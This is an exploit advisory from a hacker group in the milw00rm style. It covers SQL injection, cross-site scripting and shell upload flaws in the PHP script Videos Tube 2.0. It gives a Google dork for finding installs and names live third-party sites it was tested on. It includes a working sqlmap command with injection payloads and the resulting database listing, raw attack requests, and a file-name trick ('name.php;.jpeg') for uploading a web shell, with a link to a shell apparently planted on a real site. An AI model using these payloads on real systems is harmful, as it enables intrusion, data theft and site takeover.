Videos Tube 2.0 <= (SQL/XSS/Shell Upload) Multiple Vulnerabilities
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://Cyber-Warrior.ORG -
[+] Greetz to : http://1337day.com - http://milw00rm.com
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
KnocKout, Septemb0x , BARCOD3 , _UnDeRTaKeR_
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/ Turkey
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Videos Tube
|~Price : FREE
|~Version : 2.0, updated the lastest version.
|~Software: http://www.phpscriptlerim.com/ucretsiz/videos-tube.html
|~Multiple Vulnerabilities: SQL Injection & Cross Site Scripting & Shell Upload
|~Google DORK : "© 2014, Videos Tube. Tm Haklar Sakldr."
|[~]Date : "15 KAS. 2014"
|[~]Tested on : Kali Linux
Tested on Demos;
http://demo.phpscriptlerim.com/free/videostube/
http://www.tger61.com/
http://www.birkovabuziddiasi.com/
http://video.egitimledirilis.com/
====================== SQL Injection Vulnerability (POST Method) ===============
Example; http://demo.phpscriptlerim.com/free/videostube/
Target: http://demo.phpscriptlerim.com/free/videostube/search.php
POST :/ search=[SQL Injection]&ara=
-------------------------------------------------------------
POST /free/videostube/search.php HTTP/1.1
Host: demo.phpscriptlerim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://demo.phpscriptlerim.com/free/videostube/search.php
Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
search=[Post Method SQL Injection]&ara=
..
..
##############Exploitation sqlmap console.##########
sqlmap -u "http://demo.phpscriptlerim.com/free/videostube/search.php" --data"=search=&ara=" -p "search" --dbs
####################################################
---
Place: POST
Parameter: search
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: search=-6400' OR (6785=6785)#&ara=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: search=' AND SLEEP(5)#&ara=
---
[01:16:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.34
back-end DBMS: MySQL 5.0.11
[01:16:58] [INFO] fetching database names
[01:16:58] [INFO] fetching number of databases
[01:16:58] [WARNING] reflective value(s) found and filtering out
[01:16:58] [INFO] resumed: 2
[01:16:58] [INFO] resumed: information_schema
[01:16:58] [INFO] resumed: phpscrip_videostube
available databases [2]:
[*] information_schema
[*] phpscrip_videostube
==============================================================================
==============================================================================
==================Cross Site Scripting Vulnerability =========================
Target: http://demo.phpscriptlerim.com/free/videostube/search.php
POST to :/ search=[XSS]&ara=
-------------------------------------------------------------
POST /free/videostube/search.php HTTP/1.1
Host: demo.phpscriptlerim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://demo.phpscriptlerim.com/free/videostube/search.php
Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
search=[XSS]&ara=
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
==============================================================================
==========Admin Panel - Shell Upload Vulnerability (bypass with Tamper data) =======
INFO;
performed primarily access the admin panel ; http://www.TARGET.com/yonetim/
then go..
http://www.VICTIM.com/upload/upload.php
for bypass shell file name "name.php;.jpeg"
and then using tamper data file can be loaded shell was tested!
TESTED ON : http://www.birkovabuziddiasi.com/upload/resimler/70ed4c94a1.php
=============================================================
# milw00rm.com [2014-11-15]